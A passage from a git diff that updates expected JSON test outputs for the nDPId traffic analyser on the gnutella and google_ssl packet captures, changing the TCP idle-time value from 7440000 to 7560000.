-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.66.94.132","src_port":28681,"dst_port":17735,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.66.94.132","src_port":28681,"dst_port":17735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} diff --git a/test/results/google_ssl.pcap.out b/test/results/google_ssl.pcap.out index cfba946a0..72f990c51 100644 --- a/test/results/google_ssl.pcap.out +++ b/test/results/google_ssl.pcap.out @@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"google_ssl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434443394683} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"} 